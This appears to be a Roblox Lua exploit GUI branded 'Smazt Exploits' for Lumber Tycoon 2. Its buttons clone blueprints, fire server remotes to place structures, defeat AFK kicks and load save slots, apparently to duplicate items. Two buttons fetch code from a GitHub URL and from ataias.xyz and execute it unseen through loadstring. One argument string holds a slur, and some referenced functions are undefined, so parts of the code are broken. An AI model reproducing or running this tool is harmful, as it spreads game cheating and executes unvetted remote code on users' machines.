-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local LT2DupeGui = Instance.new("Frame")
local Slot = Instance.new("TextBox")
local Load = Instance.new("TextButton")
local OpenBlood = Instance.new("TextButton")
local OpenWoof = Instance.new("TextButton")
local GoodGraphics = Instance.new("TextButton")
local BuildTools = Instance.new("TextButton")
local AlwaysDay = Instance.new("TextButton")
local Label = Instance.new("TextLabel")
local AntiAFK = Instance.new("TextButton")
local ImageLabel = Instance.new("ImageLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

LT2DupeGui.Name = "LT2DupeGui"
LT2DupeGui.Parent = ScreenGui
LT2DupeGui.BackgroundColor3 = Color3.fromRGB(58, 29, 66)
LT2DupeGui.BorderColor3 = Color3.fromRGB(255, 247, 8)
LT2DupeGui.BorderSizePixel = 3
LT2DupeGui.Position = UDim2.new(0.795297623, 0, 0.408534735, 0)
LT2DupeGui.Size = UDim2.new(0, 220, 0, 123)
LT2DupeGui.Active = true
LT2DupeGui.Draggable = true

Slot.Name = "Slot"
Slot.Parent = LT2DupeGui
Slot.BackgroundColor3 = Color3.fromRGB(255, 255, 17)
Slot.Position = UDim2.new(0.712328792, 0, 0.484848499, 0)
Slot.Size = UDim2.new(0, 58, 0, 15)
Slot.Font = Enum.Font.SourceSans
Slot.Text = ""
Slot.TextColor3 = Color3.fromRGB(0, 0, 0)
Slot.TextSize = 10.000

Load.Name = "Load"
Load.Parent = LT2DupeGui
Load.BackgroundColor3 = Color3.fromRGB(255, 240, 20)
Load.Position = UDim2.new(0.712328792, 0, 0.643939376, 0)
Load.Size = UDim2.new(0, 58, 0, 15)
Load.Font = Enum.Font.SourceSans
Load.Text = "Load Slot"
Load.TextColor3 = Color3.fromRGB(0, 0, 0)
Load.TextSize = 14.000

OpenBlood.Name = "Open Blood"
OpenBlood.Parent = LT2DupeGui
OpenBlood.BackgroundColor3 = Color3.fromRGB(251, 255, 0)
OpenBlood.Position = UDim2.new(0.570776284, 0, 0.825757682, 0)
OpenBlood.Size = UDim2.new(0, 89, 0, 12)
OpenBlood.Font = Enum.Font.SourceSans
OpenBlood.Text = "Open Blood"
OpenBlood.TextColor3 = Color3.fromRGB(0, 0, 0)
OpenBlood.TextSize = 14.000

OpenWoof.Name = "Open Woof"
OpenWoof.Parent = LT2DupeGui
OpenWoof.BackgroundColor3 = Color3.fromRGB(255, 247, 8)
OpenWoof.Position = UDim2.new(0.0319634676, 0, 0.825757325, 0)
OpenWoof.Size = UDim2.new(0, 89, 0, 12)
OpenWoof.Font = Enum.Font.SourceSans
OpenWoof.Text = "Open Woof"
OpenWoof.TextColor3 = Color3.fromRGB(0, 0, 0)
OpenWoof.TextSize = 14.000

GoodGraphics.Name = "Good Graphics"
GoodGraphics.Parent = LT2DupeGui
GoodGraphics.BackgroundColor3 = Color3.fromRGB(252, 255, 32)
GoodGraphics.Position = UDim2.new(0.570776165, 0, 0.325757354, 0)
GoodGraphics.Size = UDim2.new(0, 89, 0, 12)
GoodGraphics.Font = Enum.Font.SourceSans
GoodGraphics.Text = "Good Graphics"
GoodGraphics.TextColor3 = Color3.fromRGB(0, 0, 0)
GoodGraphics.TextSize = 14.000

BuildTools.Name = "Build Tools"
BuildTools.Parent = LT2DupeGui
BuildTools.BackgroundColor3 = Color3.fromRGB(235, 255, 14)
BuildTools.Position = UDim2.new(0.0319634676, 0, 0.325757384, 0)
BuildTools.Size = UDim2.new(0, 89, 0, 12)
BuildTools.Font = Enum.Font.SourceSans
BuildTools.Text = "Build Tools"
BuildTools.TextColor3 = Color3.fromRGB(0, 0, 0)
BuildTools.TextSize = 14.000

AlwaysDay.Name = "Always Day"
AlwaysDay.Parent = LT2DupeGui
AlwaysDay.BackgroundColor3 = Color3.fromRGB(235, 255, 10)
AlwaysDay.Position = UDim2.new(0.570776224, 0, 0.174242422, 0)
AlwaysDay.Size = UDim2.new(0, 89, 0, 12)
AlwaysDay.Font = Enum.Font.SourceSans
AlwaysDay.Text = "Always Day"
AlwaysDay.TextColor3 = Color3.fromRGB(0, 0, 0)
AlwaysDay.TextSize = 14.000

Label.Name = "Label"
Label.Parent = LT2DupeGui
Label.BackgroundColor3 = Color3.fromRGB(252, 255, 19)
Label.BorderColor3 = Color3.fromRGB(255, 255, 16)
Label.Size = UDim2.new(0, 219, 0, 12)
Label.Font = Enum.Font.FredokaOne
Label.Text = "Smazt Exploits"
Label.TextColor3 = Color3.fromRGB(0, 0, 0)
Label.TextSize = 14.000

AntiAFK.Name = "Anti AFK"
AntiAFK.Parent = LT2DupeGui
AntiAFK.BackgroundColor3 = Color3.fromRGB(235, 255, 14)
AntiAFK.Position = UDim2.new(0.0319634676, 0, 0.171285838, 0)
AntiAFK.Size = UDim2.new(0, 89, 0, 12)
AntiAFK.Font = Enum.Font.SourceSans
AntiAFK.Text = "Anti AFK"
AntiAFK.TextColor3 = Color3.fromRGB(0, 0, 0)
AntiAFK.TextSize = 14.000

ImageLabel.Parent = LT2DupeGui
ImageLabel.BackgroundColor3 = Color3.fromRGB(58, 29, 66)
ImageLabel.BorderColor3 = Color3.fromRGB(58, 29, 66)
ImageLabel.Position = UDim2.new(0.445454538, 0, 0.170731783, 0)
ImageLabel.Size = UDim2.new(0, 24, 0, 24)
ImageLabel.Image = "rbxassetid://9585867571"

-- Scripts:

local function IPDCKZ_fake_script() -- OpenBlood.LocalScript 
	local script = Instance.new('LocalScript', OpenBlood)

	script.Parent.MouseButton1Click:Connect(function()
getgenv().Blood = "cc6ebb02679f"
loadstring(game:HttpGet("https://raw.githubusercontent.com/matrixoddy/blood/main/v17.19FREEdoNOTbuy2"))("Frosty is a retard LMAO")
	end)
end
coroutine.wrap(IPDCKZ_fake_script)()
local function VCOE_fake_script() -- OpenWoof.LocalScript 
	local script = Instance.new('LocalScript', OpenWoof)

	script.Parent.MouseButton1Click:Connect(function()
local requestData = syn.request({Url="https://ataias.xyz/api/woof-loader/d4d86a1bd227/95b5f1cfc926be7e3a2236a1/beta", Method="GET"})
repeat until requestData.StatusCode == 200
pcall(function() loadstring(requestData.Body)() end)
	end)
	
end
coroutine.wrap(VCOE_fake_script)()
local function DMKCFG_fake_script() -- BuildTools.LocalScript 
	local script = Instance.new('LocalScript', BuildTools)

	script.Parent.MouseButton1Click:Connect(function()
		for i,v in pairs(game.ReplicatedStorage.Purchasables.Structures.BlueprintStructures:GetChildren()) do
			local clone = v:Clone()
			clone.Parent = game.Players.LocalPlayer.PlayerBlueprints.Blueprints
		end
	local PlayerService = game:GetService("Players")
	local LocalPlayer = PlayerService.LocalPlayer
	local ReplicatedStorage = game:GetService("ReplicatedStorage")
	
	local BlueprintRestoreTool = Instance.new("Tool", LocalPlayer.Backpack)
	BlueprintRestoreTool.Name = "Restore\n Blueprint"
	BlueprintRestoreTool.CanBeDropped = false
	BlueprintRestoreTool.RequiresHandle = false
	
	local SelectedStructure = nil
	BlueprintRestoreToolEquipped = BlueprintRestoreTool.Equipped:Connect(function()
		local Mouse = LocalPlayer:GetMouse()
	
		BlueprintRestore = Mouse.Button1Down:Connect(function(key)
	
			local target = Mouse.Target
			if (target == nil) then
				return
			end
	
			local Parent = target.Parent
			local Type = Parent:FindFirstChild("Type")
	
			if (Type ~= nil and Type.Value == "Structure" or Type.Value == "Furniture") then
				SelectedStructure = Parent
	
				local ItemName = SelectedStructure:FindFirstChild("ItemName")
				local MainCFrame = SelectedStructure:FindFirstChild("MainCFrame")
				if (ItemName ~= nil and MainCFrame ~= nil) then
					local BlueprintType = ItemName.Value
					local Position = MainCFrame.Value
	
					if (BlueprintType ~= nil and Position ~= nil) then
						ReplicatedStorage.PlaceStructure.ClientPlacedBlueprint:FireServer(BlueprintType, Position, nil, SelectedStructure)
					end
				end
			end
		end)
	end)
	
	BlueprintRestoreToolUnequipped = BlueprintRestoreTool.Unequipped:Connect(function()
		BlueprintRestoreTool:Deactivate()
		BlueprintRestore:Disconnect()
	end)
		_G.shdaki = true
		while _G.shdaki == true do
			wait(1)
	
			spawn(function()
				for i,v in pairs(game:GetService("Workspace").PlayerModels:GetDescendants()) do
					if v.Name == "ProgressBillboard" then
						v:Destroy()
					end
				end
			end)
		end
	end)
end
coroutine.wrap(DMKCFG_fake_script)()
local function CZSB_fake_script() -- AlwaysDay.LocalScript 
	local script = Instance.new('LocalScript', AlwaysDay)

	script.Parent.MouseButton1Click:Connect(function()
		game.Lighting.Changed:Connect(function()
		game.Lighting.TimeOfDay = "12:00"
		game.Lighting.Ambient = Color3.fromRGB(255,255,255)
		game.Lighting.Brightness = .5
		game.Lighting.FogEnd = 50000
		end)
		end)
end
coroutine.wrap(CZSB_fake_script)()
local function NLTC_fake_script() -- AntiAFK.LocalScript 
	local script = Instance.new('LocalScript', AntiAFK)

	script.Parent.MouseButton1Click:Connect(function()
		local vu = game:GetService("VirtualUser")
		print("Good!")
		game:GetService("Players").LocalPlayer.Idled:connect(function()
			vu:Button2Down(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
			wait(1)
			vu:Button2Up(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
		end)
	end)
end
coroutine.wrap(NLTC_fake_script)()

--Functions
local function CheckIfSlotAvailable(Slot)
	for a,b in pairs(game.ReplicatedStorage.LoadSaveRequests.GetMetaData:InvokeServer(game.Players.LocalPlayer)) do 
		if a == Slot then 
			for c,d in pairs(b) do 
				if c == "NumSaves" and d ~= 0 then 
					return true
				else
					return false
				end
			end
		end
	end
end

local function CheckSlotNumber() --Checks if the slot number is right
	if Slot.Text == "1" or Slot.Text == "2" or Slot.Text == "3" or Slot.Text == "4" or Slot.Text == "5" or Slot.Text == "6" then
		local SlotNumber = tonumber(Slot.Text)
		return SlotNumber
	else return false
	end
end



Load.MouseButton1Down:connect(function() --Loads the slot you want
	ScriptLoadOrSave = true
	local CheckSlot = CheckSlotNumber()
	if CheckSlot ~= false then
		if CheckIfSlotAvailable(CheckSlot) == true then
			local LoadSlot = game.ReplicatedStorage.LoadSaveRequests.RequestLoad:InvokeServer(CheckSlot)
			if LoadSlot == false then
				SendNotification("Cooldown Notification", "You aren't abled to load now", 1)
			end
			if LoadSlot == true then 
				SendNotification("Reload Notification", "Loaded Your Slot", 2)
				CurrentSlot = CheckSlot
			end
		else
			SendNotification("Slot not Available", "This Slot is not Available, please choose another slot", 2)
		end
	else
		SendNotification("Incorrect Slot", "Enter a Valid number in the upper field", 1)
	end
	ScriptLoadOrSave = false
end)

--Anti Overwrite Slot (Sub-Function)
while wait(.15) do
	if CurrentlySavingOrLoading.Value == true and ScriptLoadOrSave == false then
		repeat 
			wait(1)
		until CurrentlySavingOrLoading.Value == false
		wait(1)
		CurrentSlot = game.Players.LocalPlayer.CurrentSaveSlot.Value
		print(CurrentSlot)
	end
end
